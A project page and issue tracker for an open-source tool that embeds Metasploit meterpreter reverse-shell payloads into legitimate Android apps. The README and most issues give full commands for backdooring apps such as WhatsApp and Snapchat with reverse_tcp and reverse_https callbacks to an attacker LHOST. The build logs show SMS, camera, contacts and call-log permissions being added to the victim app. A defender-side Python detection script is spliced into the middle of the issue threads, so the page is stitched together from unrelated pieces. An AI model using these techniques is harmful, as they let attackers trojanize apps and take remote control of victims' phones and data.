
metasploit-apk-embed-payload's Introduction

Use it at your own risk.

Embed a Metasploit Payload in an Original .Apk File

I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it.

— Bill Gates

This script is a POC for injecting Metasploit payloads into arbitrary APKs.

Authored by timwr and Jack64, developed by xC0d3rZ.

Installation

 gem install bundler
 bundler install

Requirements

  1. Ruby (>= 1.8.7).
  2. apktool.jar (>= 2.x).

Usage

./run [target.apk] [msfvenom options]

e.g.
./run messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443

metasploit-apk-embed-payload's People

Contributors: 0-ali, powdo


metasploit-apk-embed-payload's Issues

backdoor priv escalate

I keep getting this error "stdapi_fs_ls" when I try to look into the sdcard, and I can't even upload things, but when I use the embedded backdoor I can do anything I want. Is there any way to fix it? Thanks!

original.apk was not found or was not readable.

It seems like Bug 15 is still there.

Embed a Metasploit Payload in an Original .Apk File v0.2
[1] Generating msfvenom payload
[2] Signing payload
cp: das angegebene Ziel '/tmp/D2KT664/original.apk' ist kein Verzeichnis
[3] Decomposing original APK
Input file (/tmp/D2KT664/original.apk) was not found or was not readable.
[4] Decomposing payload APK
lib/embed-payload.rb:210:in `initialize': No such file or directory @ rb_sysopen - /tmp/D2KT664/original/AndroidManifest.xml (Errno::ENOENT)
	from lib/embed-payload.rb:210:in `open'
	from lib/embed-payload.rb:210:in `embeddingPayload'
	from lib/embed-payload.rb:11:in `initialize'
	from apk-embed-payload.rb:30:in `new'
	from apk-embed-payload.rb:30:in `<main>'

I get this stacktrace with following command:
ruby apk-embed-payload.rb BezahlLadung.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.88 LPORT=4444

I'm using ruby 2.4

ruby --version
ruby 2.4.0p0 (2016-12-24 revision 57164) [x86_64-linux]

On Arch GNU/*/Linux

uname -a
Linux Pipboy 4.9.8-1-ARCH #1 SMP PREEMPT Mon Feb 6 12:59:40 CET 2017 x86_64 GNU/Linux

My msfvenom is working fine.
And I'm pretty sure that all needed gems are correctly installed.

bash: ./run no such file or directory

Hi there!
gem bundler installs fine, but when I try to run the following:
./run Night_Mode.apk -p android/meterpreter/reverse_http LHOST=192.168.1.102 LPORT=24
an error occurs:
bash: ./run: No such file or directory
I'm running that command from the root directory which contains Night_Mode.apk.
What should I do?

java.lang.NoClassDefFoundError

I've just embedded a Metasploit payload into an app, but when I try to run the application it fails with java.lang.NoClassDefFoundError

05-31 20:39:12.207 E/AndroidRuntime( 2900): FATAL EXCEPTION: main
05-31 20:39:12.207 E/AndroidRuntime( 2900): Process: com.example.fabio.myapplication, PID: 2900
05-31 20:39:12.207 E/AndroidRuntime( 2900): java.lang.NoClassDefFoundError: Failed resolution of: Lcom/metasploit/stage/d;
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.metasploit.stage.Payload.startInPath(Unknown Source)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.metasploit.stage.Payload.start(Unknown Source)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.example.fabio.myapplication.MainActivity.onCreate(MainActivity.java:10)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.Activity.performCreate(Activity.java:6679)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1118)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2618)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2726)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread.-wrap12(ActivityThread.java)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1477)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.os.Handler.dispatchMessage(Handler.java:102)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.os.Looper.loop(Looper.java:154)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at android.app.ActivityThread.main(ActivityThread.java:6119)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at java.lang.reflect.Method.invoke(Native Method)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:886)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:776)
05-31 20:39:12.207 E/AndroidRuntime( 2900): Caused by: java.lang.ClassNotFoundException: Didn't find class "com.metasploit.stage.d" on path: DexPathList[[zip file "/data/app/com.example.fabio.myapplication-1/base.apk"],nativeLibraryDirectories=[/data/app/com.example.fabio.myapplication-1/lib/x86, /system/lib, /vendor/lib]]
05-31 20:39:12.207 E/AndroidRuntime( 2900): at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at java.lang.ClassLoader.loadClass(ClassLoader.java:380)
05-31 20:39:12.207 E/AndroidRuntime( 2900): at java.lang.ClassLoader.loadClass(ClassLoader.java:312)

The command to generate the apk was just:

./run myapp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=5555

backdoor

OK, the program worked. When I install and open it, it keeps closing the session even though I'm still on the app... How do I fix it?

Missing file or dir

It seems like the program can't find a file called payload.apk,
but the dir /tmp/NJTYNVC/ is created with an original/ dir and an original.apk in it.

[2] Signing payload
java.io.FileNotFoundException: /tmp/NJTYNVC/payload.apk (Datei oder Verzeichnis nicht gefunden)
  at java.util.zip.ZipFile.open(Native Method)
  at java.util.zip.ZipFile.<init>(ZipFile.java:219)
  at java.util.zip.ZipFile.<init>(ZipFile.java:149)
  at java.util.jar.JarFile.<init>(JarFile.java:166)
  at java.util.jar.JarFile.<init>(JarFile.java:145)
  at com.android.signapk.SignApk.main(SignApk.java:320)

Another exception in step 4

[4] Decomposing payload APK
Input file (/tmp/NJTYNVC/signapk.apk) was not found or was not readable.

And a final one in step 7

[7] Loading MainActivity.smali and injecting payload
lib/embed-payload.rb:79:in initialize: No such file or directory @ rb_sysopen - /tmp/NJTYNVC/payload/AndroidManifest.xml (Errno::ENOENT)
  from lib/embed-payload.rb:79:in open
  from lib/embed-payload.rb:79:in fixManifest
  from lib/embed-payload.rb:246:in embeddingPayload
  from lib/embed-payload.rb:11:in initialize
  from apk-embed-payload.rb:30:in new
  from apk-embed-payload.rb:30:in <main>

I guess it depends on signing.
I'm using Arch GNU/Linux with ruby 2.3 & OpenJDK 1.8.2 (64 Bit)

Error in the ruby file

Traceback (most recent call last):
	6: from apk-embed-payload.rb:30:in `<main>'
	5: from apk-embed-payload.rb:30:in `new'
	4: from lib/embed-payload.rb:11:in `initialize'
	3: from lib/embed-payload.rb:246:in `embeddingPayload'
	2: from lib/embed-payload.rb:79:in `fixManifest'
	1: from lib/embed-payload.rb:79:in `open'
lib/embed-payload.rb:79:in `initialize': No such file or directory @ rb_sysopen - /tmp/JFP27FG/payload/AndroidManifest.xml (Errno::ENOENT)

Error

ruby apk-embed-payload.rb ClashOriginal.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444
/usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- colorize (LoadError)
	from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
	from apk-embed-payload.rb:9:in `<main>'

what should I do?!

embed backdoor problem

I get this when I run the command
./run snapchat.apk -p android/meterpreter/reverse_https LHOST=192.168.0.105 LPORT=4444
/usr/local/lib/site_ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- colorize (LoadError)
	from /usr/local/lib/site_ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
	from apk-embed-payload.rb:9:in `<main>'
How do I fix it?

Error when Rebuilding

Error when rebuilding the .apk with the Metasploit payload:
[!] Upgrade apktool to the latest apktool.jar fixes the issue completely
I'm already using the latest apktool, 2.2.1.

Embedded Payload not running

Hi Team,

I am unsure if I am doing something wrong - I can't seem to get the _embedded APK

Environment: Fully updated Kali 2 (Rolling)
Command: ./run original.apk.file.apk -p android/meterpreter/reverse_tcp LHOST=my.domain.com
Notes: Creating a direct APK (msfvenom) using the same options worked exactly as expected.

Output from command:

Embed a Metasploit Payload in an Original .Apk File v0.2
[1] Generating msfvenom payload
[2] Signing payload
[3] Decomposing original APK
[4] Decomposing payload APK
[5] Locating onCreate() hook
[6] Copying payload files
[7] Loading StartupActivity.smali and injecting payload
[+] Adding android.permission.ACCESS_WIFI_STATE
[+] Adding android.permission.CHANGE_WIFI_STATE
[+] Adding android.permission.ACCESS_NETWORK_STATE
[+] Adding android.permission.ACCESS_COURSE_LOCATION
[+] Adding android.permission.ACCESS_FINE_LOCATION
[+] Adding android.permission.SEND_SMS
[+] Adding android.permission.RECEIVE_SMS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.CALL_PHONE
[+] Adding android.permission.READ_CONTACTS
[+] Adding android.permission.WRITE_CONTACTS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.CAMERA
[+] Adding android.permission.READ_SMS
[+] Adding android.permission.RECEIVE_BOOT_COMPLETED
[+] Adding android.permission.SET_WALLPAPER
[+] Adding android.permission.READ_CALL_LOG
[+] Adding android.permission.WRITE_CALL_LOG
[8] Rebuilding original.apk.file.apk with metasploit payload
W: warning: string 'chapter_no' has no default translation.
W: warning: string 'directory_error' has no default translation.
W: warning: string 'new_label_prompt' has no default translation.
W: warning: string 'prefs_split_screen_linked' has no default translation.
W: warning: string 'prefs_split_screen_not_linked' has no default translation.
W: warning: string 'prefs_split_screen_single' has no default translation.
W: warning: string 'prefs_split_screen_summary' has no default translation.
W: warning: string 'prefs_split_screen_title' has no default translation.
W: warning: string 'sdcard_error' has no default translation.
W: warning: string 'send_sms' has no default translation.
[9] Signing net_embedded.apk
[+]  has been embedded,original.apk.file.apk_embedded.apk

Is it possible that the warnings listed above could be preventing the embedded Metasploit APK from running? I didn't think much of it as it was a warning vs. an error.
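A defender-side counterpart to the run shown above, added here as an example and not part of the project's code: it triages an apktool-decoded directory for the two artifacts that run produces, the permission block appended to AndroidManifest.xml and the com.metasploit.stage package copied under smali/ (the class path in the NoClassDefFoundError issue earlier on this page). It assumes apktool's standard decode layout (AndroidManifest.xml at the top level, one or more smali*/ directories); the sample manifest, the Payload.smali stub and the overlap threshold are constructed assumptions for the demo.

```python
"""Added example (not the project's code): triage an apktool-decoded APK
directory for the artifacts reported in the run above, namely the block of
permissions appended to AndroidManifest.xml and the com.metasploit.stage
package copied under smali/.  Layout assumed: AndroidManifest.xml at the top
level and one or more smali*/ directories, which is apktool's decode output.
The sample manifest and smali file are constructed here for the demo."""
import os
import tempfile
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions the tool reports adding in the issue output above.  Note that
# ACCESS_COURSE_LOCATION is the tool's own misspelling of
# ACCESS_COARSE_LOCATION, which makes it a cheap and specific indicator.
INJECTED_PERMISSIONS = frozenset(
    "android.permission." + p for p in (
        "ACCESS_WIFI_STATE", "CHANGE_WIFI_STATE", "ACCESS_NETWORK_STATE",
        "ACCESS_COURSE_LOCATION", "ACCESS_FINE_LOCATION", "SEND_SMS",
        "RECEIVE_SMS", "RECORD_AUDIO", "CALL_PHONE", "READ_CONTACTS",
        "WRITE_CONTACTS", "CAMERA", "READ_SMS", "RECEIVE_BOOT_COMPLETED",
        "SET_WALLPAPER", "READ_CALL_LOG", "WRITE_CALL_LOG",
    )
)
MISSPELLED_COARSE = "android.permission.ACCESS_COURSE_LOCATION"
STAGE_PACKAGE = os.path.join("com", "metasploit", "stage")
OVERLAP_THRESHOLD = 10  # assumption: few benign apps request this many of the set


def manifest_permissions(manifest_path):
    """Return the set of <uses-permission android:name=...> values."""
    root = ET.parse(manifest_path).getroot()
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")} - {None}


def find_stage_package(decoded_dir):
    """Return smali directories that contain the com/metasploit/stage package.
    apktool splits multidex output into smali/, smali_classes2/, ... so every
    smali* directory is checked."""
    hits = []
    for entry in sorted(os.listdir(decoded_dir)):
        if entry.startswith("smali"):
            candidate = os.path.join(decoded_dir, entry, STAGE_PACKAGE)
            if os.path.isdir(candidate):
                hits.append(candidate)
    return hits


def triage(decoded_dir):
    """Summarise the indicators found in one decoded APK directory."""
    perms = manifest_permissions(os.path.join(decoded_dir, "AndroidManifest.xml"))
    overlap = perms & INJECTED_PERMISSIONS
    stage_dirs = find_stage_package(decoded_dir)
    return {
        "stage_package_dirs": stage_dirs,
        "injected_permission_overlap": sorted(overlap),
        "misspelled_coarse_location": MISSPELLED_COARSE in perms,
        "suspicious": bool(stage_dirs) or len(overlap) >= OVERLAP_THRESHOLD,
    }


def write_sample(decoded_dir, permissions, with_stage_package):
    """Construct a minimal apktool-like tree for the demo (constructed data)."""
    lines = ['<?xml version="1.0" encoding="utf-8"?>',
             '<manifest xmlns:android="http://schemas.android.com/apk/res/android"',
             '          package="com.example.sample">']
    lines += ['    <uses-permission android:name="%s"/>' % p for p in permissions]
    lines += ['    <application android:label="sample"/>', '</manifest>']
    with open(os.path.join(decoded_dir, "AndroidManifest.xml"), "w") as fh:
        fh.write("\n".join(lines))
    os.makedirs(os.path.join(decoded_dir, "smali", "com", "example", "sample"))
    if with_stage_package:
        stage = os.path.join(decoded_dir, "smali", STAGE_PACKAGE)
        os.makedirs(stage)
        with open(os.path.join(stage, "Payload.smali"), "w") as fh:
            fh.write(".class public Lcom/metasploit/stage/Payload;\n")


def demo():
    """Triage one benign-looking tree and one carrying both artifacts."""
    results = []
    for perms, stage in (
        (["android.permission.INTERNET", "android.permission.ACCESS_NETWORK_STATE"], False),
        (["android.permission.INTERNET"] + sorted(INJECTED_PERMISSIONS), True),
    ):
        with tempfile.TemporaryDirectory() as d:
            write_sample(d, perms, stage)
            results.append(triage(d))
    return results[0], results[1]


if __name__ == "__main__":
    for label, result in zip(("benign", "embedded"), demo()):
        print(label, result)
```

Point `triage()` at a real `apktool d` output directory to use it outside the demo; the package-directory check is the strong signal, and the permission overlap is only corroborating, since a legitimate messaging or dialer app can legitimately request several of the listed permissions.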

ERROR during building the embedded apk

Hi, I've tried your script, and an error comes out at the final step of the script, before the signing phase. I have apktool 2.2.1 currently installed on my Kali 2016 rolling system. I got 2 different errors, for two different original .apk files:
First error (a LinkedIn apk):
[8] Rebuilding linkedin.apk with metasploit payload W: /tmp/K9REEEW/original/AndroidManifest.xml:46: error: No resource identifier found for attribute 'networkSecurityConfig' in package 'android' W: Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_1166162700259302219.tmp, p, --forced-package-id, 127, --min-sdk-version, 15, --target-sdk-version, 25, --version-code, 88800, --version-name, 4.0.85, -F, /tmp/APKTOOL5712275118375082832.tmp, -0, arsc, -0, webp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/K9REEEW/original/res, -M, /tmp/K9REEEW/original/AndroidManifest.xml] at brut.androlib.Androlib.buildResourcesFull(Androlib.java:478) at brut.androlib.Androlib.buildResources(Androlib.java:412) at brut.androlib.Androlib.build(Androlib.java:311) at brut.androlib.Androlib.build(Androlib.java:264) at brut.apktool.Main.cmdBuild(Main.java:227) at brut.apktool.Main.main(Main.java:84) Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_1166162700259302219.tmp, p, --forced-package-id, 127, --min-sdk-version, 15, --target-sdk-version, 25, --version-code, 88800, --version-name, 4.0.85, -F, /tmp/APKTOOL5712275118375082832.tmp, -0, arsc, -0, webp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/K9REEEW/original/res, -M, /tmp/K9REEEW/original/AndroidManifest.xml] at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:439) at brut.androlib.Androlib.buildResourcesFull(Androlib.java:464) ... 
5 more Caused by: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_1166162700259302219.tmp, p, --forced-package-id, 127, --min-sdk-version, 15, --target-sdk-version, 25, --version-code, 88800, --version-name, 4.0.85, -F, /tmp/APKTOOL5712275118375082832.tmp, -0, arsc, -0, webp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/K9REEEW/original/res, -M, /tmp/K9REEEW/original/AndroidManifest.xml] at brut.util.OS.exec(OS.java:95) at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:433) ... 6 more [!] Upgrade apktool to the latest apktool.jar fixes the issue completely

Then with FacebookLite apk I got:
[+] Adding android.permission.WRITE_CALL_LOG [8] Rebuilding facebooklite.apk with metasploit payload ../../../../tmp/WP3V3KK/original/smali/com/facebook/lite/MainActivity.smali[522,4] Invalid register: v22. Must be between v0 and v15, inclusive. Exception in thread "main" brut.androlib.AndrolibException: Could not smali file: com/facebook/lite/MainActivity.smali at brut.androlib.src.SmaliBuilder.buildFile(SmaliBuilder.java:77) at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61) at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:38) at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:405) at brut.androlib.Androlib.buildSources(Androlib.java:336) at brut.androlib.Androlib.build(Androlib.java:292) at brut.androlib.Androlib.build(Androlib.java:264) at brut.apktool.Main.cmdBuild(Main.java:227) at brut.apktool.Main.main(Main.java:84) [!] Upgrade apktool to the latest apktool.jar fixes the issue completely

In both cases your script stopped before I could even test an app with an embedded payload.

Problem finding hook

[*] Unable to find correct hook automatically
[*] Please choose from one of the following:
[*]

No choice is proposed.

I've simply changed the message type to "info" where it is not an "error", in embed-payload.rb line 219:

219 messagePrint("Unable to find correct hook automatically","info")

apktool

Bro Mohammed Ali, I face a problem when compiling the apk.
It says: upgrade your apktool to the latest version.
Note: I tried it manually, I mean decompiling the original apk and the payload, then copying it inside the original dir, then compiling it, but it shows me the same message.
::
Hello brother, you are from Sudan and so am I. I read your bio; you love AI, and so do I. I'd like to get in touch with you; your Facebook page link does not work. Please reply.

Can't listen

When I open the apk with BlueStacks, the app launches correctly, but nothing happens on my msf, even though it seems to me correctly configured.

apktool error is showing

This is the error I got after executing this:

./apkembed.rb facebook.apk -p android/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XXX LPORT=4444

[-] Apktool version Apktool v1.5.2 - a tool for reengineering Android apk files
Copyright 2010 Ryszard Wiśniewski [email protected]
with smali v1.4.1, and baksmali v1.4.1
Updated by @iBotPeaches [email protected]
Apache License 2.0 (http://www.apache.org/licenses/LICENSE-2.0)

Usage: apktool [-q|--quiet OR -v|--verbose] COMMAND [...]

COMMANDs are:

d[ecode] [OPTS] <file.apk> [<dir>]
    Decode <file.apk> to <dir>.

    OPTS:

    -s, --no-src
        Do not decode sources.
    -r, --no-res
        Do not decode resources.
    -d, --debug
        Decode in debug mode. Check project page for more info.
    -b, --no-debug-info
        Baksmali -- don't write out debug info (.local, .param, .line, etc.)
    -f, --force
        Force delete destination directory.
    -t <tag>, --frame-tag <tag>
        Try to use framework files tagged by <tag>.
    --frame-path <dir>
        Use the specified directory for framework files
    --keep-broken-res
        Use if there was an error and some resources were dropped, e.g.:
        "Invalid config flags detected. Dropping resources", but you
        want to decode them anyway, even with errors. You will have to
        fix them manually before building.

b[uild] [OPTS] [<app_path>] [<out_file>]
    Build an apk from already decoded application located in <app_path>.

    It will automatically detect, whether files was changed and perform
    needed steps only.

    If you omit <app_path> then current directory will be used.
    If you omit <out_file> then <app_path>/dist/<name_of_original.apk>
    will be used.

    OPTS:

    -f, --force-all
        Skip changes detection and build all files.
    -d, --debug
        Build in debug mode. Check project page for more info.
    -a, --aapt
        Loads aapt from specified location.

if|install-framework <framework.apk> [<tag>] --frame-path [<location>] 
    Install framework file to your system.

For additional info, see: http://code.google.com/p/android-apktool/
For smali/baksmali info, see: http://code.google.com/p/smali/
not supported, please download the latest 2. version from git.

What is the origin of the signapk signature?

Is it just any old cert you created, and if so, why not include the openssl commands for certificate creation at script runtime? It seems like it makes sense for openssl to be a dependency of this project.

Internet Not Found

I am connected to the internet and my internet is also working (YouTube works), but it is not detecting the internet.

Many Problems

First:-

[2] Signing payload
java.io.FileNotFoundException: /tmp/K7X9X9K/payload.apk (No such file or directory)
	at java.util.zip.ZipFile.open(Native Method)
	at java.util.zip.ZipFile.<init>(ZipFile.java:225)
	at java.util.zip.ZipFile.<init>(ZipFile.java:155)
	at java.util.jar.JarFile.<init>(JarFile.java:166)
	at java.util.jar.JarFile.<init>(JarFile.java:145)
	at com.android.signapk.SignApk.main(SignApk.java:320)

Second: The third phase is full of this

[3] Decomposing original APK
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x00000055
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x0000001a
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x00000055
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x0000001a
W: Could not decode attr value, using undecoded value instead: ns=android, name=installLocation, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=minSdkVersion, value=0x00000007
W: Could not decode attr value, using undecoded value instead: ns=android, name=targetSdkVersion, value=0x00000015
W: Could not decode attr value, using undecoded value instead: ns=android, name=anyDensity, value=0xffffffff

and ends with this

Exception in thread "main" brut.androlib.AndrolibException: java.io.FileNotFoundException: /root/.local/share/apktool/framework/1.apk (No such file or directory)
	at brut.androlib.res.AndrolibResources.getFrameworkApk(AndrolibResources.java:588)
	at brut.androlib.res.AndrolibResources.loadFrameworkPkg(AndrolibResources.java:121)
	at brut.androlib.res.data.ResTable.getPackage(ResTable.java:83)
	at brut.androlib.res.data.ResTable.getResSpec(ResTable.java:66)
	at brut.androlib.res.data.ResTable.getResSpec(ResTable.java:62)
	at brut.androlib.res.data.value.ResReferenceValue.getReferent(ResReferenceValue.java:62)
	at brut.androlib.res.data.value.ResReferenceValue.referentIsNull(ResReferenceValue.java:73)
	at brut.androlib.res.data.value.ResStyleValue.serializeToResValuesXml(ResStyleValue.java:49)
	at brut.androlib.res.data.value.ResBagValue.serializeToResValuesXml(ResBagValue.java:42)
	at brut.androlib.res.AndrolibResources.generateValuesFile(AndrolibResources.java:517)
	at brut.androlib.res.AndrolibResources.decode(AndrolibResources.java:267)
	at brut.androlib.Androlib.decodeResourcesFull(Androlib.java:131)
	at brut.androlib.ApkDecoder.decode(ApkDecoder.java:108)
	at brut.apktool.Main.cmdDecode(Main.java:166)
	at brut.apktool.Main.main(Main.java:81)
Caused by: java.io.FileNotFoundException: /root/.local/share/apktool/framework/1.apk (No such file or directory)
	at java.io.FileOutputStream.open0(Native Method)
	at java.io.FileOutputStream.open(FileOutputStream.java:270)
	at java.io.FileOutputStream.<init>(FileOutputStream.java:213)
	at java.io.FileOutputStream.<init>(FileOutputStream.java:162)
	at brut.androlib.res.AndrolibResources.getFrameworkApk(AndrolibResources.java:584)
	... 14 more

Third:-

[4] Decomposing payload APK
Input file (/tmp/K7X9X9K/signapk.apk) was not found or was not readable.

Fourth:-

[5] Locating onCreate() hook
lib/embed-payload.rb:215:in `embeddingPayload': undefined method `gsub' for 0:Integer (NoMethodError)
	from lib/embed-payload.rb:11:in `initialize'
	from apk-embed-payload.rb:30:in `new'
	from apk-embed-payload.rb:30:in `<main>'

The rmagick gem trouble on linux

If suddenly you get this error

Building native extensions.  This could take a while...
ERROR:  Error installing rmagick:
    ERROR: Failed to build gem native extension.
Can't install RMagick 2.13.2. Can't find Magick-config

That means the devel package is not installed, so you pick it up on Ubuntu > 12.04 with:

sudo apt-get install libmagick++-dev

and you get the complete stack:

dpkg -l | grep imagema
ii  imagemagick
ii  imagemagick-common
ii  libmagic1:i386
ii  libmagick++-dev
......

based on this link

Error creating injection APK

I'm getting this:

[9] Rebuilding app-debug.apk with meterpreter injection as app-debug_backdoored.apk
Exception in thread "main" brut.androlib.AndrolibException: brut.directory.DirectoryException: java.io.FileNotFoundException: /root/metasploit-apk-embed-payload/tmp/NP7YEQ/app-debug_backdoored.apk (No such file or directory)

The full log.
I'm sure I have the android-sdk installed correctly. (from apt-get, and in my path).

Ubuntu 16.04 with ruby 2.3.1p112 (2016-04-26) [x86_64-linux-gnu]

Error Android SDK

duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ cp ../WhatsApp.apk .
duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895

[ASCII-art banner]

[*] Authored by timwr, Jack64&Updated by xC0d3rZ.
sh: 1: /opt/metasploit-framework/Apks/metasploit-apk-embed-payload/embed_tools/apktool.sh: Permission denied
apk-embed-payload.rb:156:in `<main>': undefined method `include?' for nil:NilClass (NoMethodError)
duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ chmod +x embed_tools/*.sh
duard@LoveTC:/opt/metasploit-framework/Apks/metasploit-apk-embed-payload$ ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895

[ASCII-art banner]

[*] Authored by timwr, Jack64&Updated by xC0d3rZ.
[1] Generating msfvenom payload
[2] Signing payload
[3] Decompiling orignal APK
[4] Decompiling payload APK
[5] Locating onCreate() hook
[6] Copying payload files
[7] Loading Main.smali and injecting payload
[8] Poisoning the manifest with meterpreter permissions
[*] Adding android.permission.ACCESS_COURSE_LOCATION
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[9] Rebuilding WhatsApp.apk with meterpreter injection as WhatsApp_backdoored.apk
[-] Error creating injection APK,If you haven't Android-SDK please install it.


Permissions problem on Android

Hello,

I've tried your script with the latest WhatsApp apk; nothing seems to go wrong. I upload the embedded apk to my phone, and there I get these problems:

  • When I click on the app built with the script to install it, I get this:

[screenshot: install_apk_block]

  • When I try to do it by hand (decompiling, moving, building, etc.) I get this, and the payload doesn't start when the app launches:

[screenshot: install_app_payload_hand]

  • And when I build only the payload with msfvenom, everything works, like this:

[screenshot: original_payload_apk]

I'm running Android Nougat 7.1 AICP on the phone and the latest Kali Linux.

Thanks in advance

Hooks not showing up.

[screenshot: hook]

I tried entering the path to the activity, but it's expecting a number... Any ideas?
